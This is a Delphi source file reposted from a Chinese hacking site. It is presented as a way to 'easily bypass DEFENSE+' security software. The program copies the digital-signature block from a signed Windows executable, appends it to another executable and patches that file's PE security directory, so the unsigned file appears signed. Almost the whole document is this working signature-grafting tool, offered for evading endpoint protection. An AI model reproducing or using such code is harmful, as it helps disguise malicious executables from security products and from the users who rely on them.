Use this source code can easily bypass the DEFENSE+
unit uMain;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls;
type
TForm1 = class(TForm)
Button1: TButton;
SelFile: TOpenDialog;
EFile1: TEdit;
Label1: TLabel;
Label2: TLabel;
EFile2: TEdit;
Button2: TButton;
Button3: TButton;
Button4: TButton;
CBbakFile: TCheckBox;
Label3: TLabel;
procedure Button1Click(Sender: TObject);
procedure Button2Click(Sender: TObject);
procedure Button3Click(Sender: TObject);
procedure Button4Click(Sender: TObject);
procedure FormClose(Sender: TObject; var Action: TCloseAction);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
procedure ShowMessBox(pvCaptiong, pvText: string);
begin
MessageBox(Form1.Handle, PAnsiChar(pvText), PAnsiChar(pvCaptiong), 0);
end;
function ReadHexDZ(fvFileName:string; fvHexDZ:Integer):Integer; //读取指定偏移地址十六进制数据
var
//vBuffer : array of byte; //没指定长度的话调用函数回出错
vBuffer : array [0…3] of byte; //指定长度
vInt : integer;
vFS : TFileStream;
vStr : string;
begin
Result := -1 ;
vStr:= ‘’;
try
vFS:= TFileStream.Create(fvFileName, fmOpenRead); //以读取方式打开
vFS.Position:= fvHexDZ; //设置开始位置
vFS.ReadBuffer(vBuffer, SizeOf(vBuffer)); //读取数据到缓冲区
for vInt:=0 to 3 do
vStr:=IntToHex(vBuffer[vInt], 2) + vStr; //得到16进制
Result:= StrToInt(‘$’+vStr) ;
except
Result := -1
END;
vFS.Free;
end;
procedure TForm1.Button1Click(Sender: TObject);
begin
Self.Close;
end;
procedure TForm1.Button2Click(Sender: TObject);
begin
SelFile.Title := ‘请选择含有数字签名的文件’;
if not SelFile.Execute then Exit;
EFile1.Text := Selfile.FileName;
end;
procedure TForm1.Button3Click(Sender: TObject);
begin
SelFile.Title := ‘请选择要添加数字签名的文件’;
if not SelFile.Execute then Exit;
EFile2.Text := Selfile.FileName;
end;
procedure TForm1.Button4Click(Sender: TObject);
var
vFile1, vFile2: string;
vBuf1,vBuf2: array [0…3] of Byte;
vFS: TFileStream;
vBufAttr: array [0…100000] of PAnsiChar ;
vFile2SZQMDZ,
vFile1SZQMDZ, //指定数字签名的地址
vFile1SZQMSizeDZ, //指定数字签名大小
vSZQMDZ, //数字签名地址
vBufSize:integer;//数字签名大小
vStr, vNewStr, vNewStr2:string;
vInt: Integer;
begin
vFile1:= Trim(EFile1.Text);
vFile2 := Trim(EFile2.Text);
if not FileExists(vFile1) or not FileExists(vFile2) then
begin
ShowMessBox(‘消息’, ‘找不到文件!’);
Exit;
end;
if CBbakFile.Checked then
CopyFile(PAnsiChar(vFile2), PAnsiChar(ExtractFileName(vFile2)+‘.bak’), False);
vFile1SZQMDZ:= ReadHexDZ(vFile1, $3C) + $98 ; //数字签名地址
vFile1SZQMSizeDZ := vFile1SZQMDZ +$4; //数字签名大小地址
vSZQMDZ:= ReadHexDZ(vFile1, vFile1SZQMDZ); //数字签名开始位置
vBufSize := ReadHexDZ(vFile1, vFile1SZQMSizeDZ) ;
//ShowMessBox(IntToStr(vFile1SZQMSizeDZ), IntToStr(vBufSize));
// exit;
try
vFS := TFileStream.Create(vFile1, fmOpenRead);
try
vFS.Position:= vFile1SZQMDZ;
vFS.ReadBuffer(vBuf1, 4); //得到记录数字签名所在地的缓冲区
vFS.Position:= vFile1SZQMSizeDZ;
vFS.ReadBuffer(vBuf2, 4); //得到记录数字签名大小的缓冲区
vFS.Position:= vSZQMDZ;
vFS.ReadBuffer(vBufAttr, vBufSize); //读取数字签名数据到vbufattr
finally
vFS.Free;
end;
vFile2SZQMDZ := ReadHexDZ(vFile2, $3C) + $98;
vFS := TFileStream.Create(vFile2, fmOpenReadWrite);
try
vFS.Position:= vFile2SZQMDZ;
vStr:= IntToHex(vFS.Size, 8);
vNewStr:= Copy(vStr, 7, 2) ;
vNewStr:= vNewStr + Copy(vStr, 5, 2) ;
vNewStr:= vNewStr + Copy(vStr, 3, 2) ;
vNewStr:= vNewStr + Copy(vStr, 1, 2) ;
vNewStr2:= '';
for vInt:=1 to (length(vNewStr) div 2) do
vNewStr2:=vNewStr2+char(strtoint('$'+copy(vNewStr,(vInt-1)*2+1,2)));
vFS.WriteBuffer(Pointer(vNewStr2)^, 4); //写入数据指定数字签名所在地
vFS.Position := vFile2SZQMDZ + $4;
vFS.WriteBuffer(vbuf2, SizeOf(vBuf2)); //写入数据指定数字签名大小
vFS.Position:= vFS.Size;
vFS.WriteBuffer(vBufAttr, vBufSize);
finally
vFS.Free;
end;
ShowMessBox('消息','添加数字签名成功');
except
ShowMessBox(‘坏消息’,‘添加数字签名出错’);
end;
end;
procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
begin
Action:= caFree;
end;
end.
This article from the New Century Network Security base (www.520hack.com) Original Source:
http://www.520hack.com/Article/Text6/200906/14604.html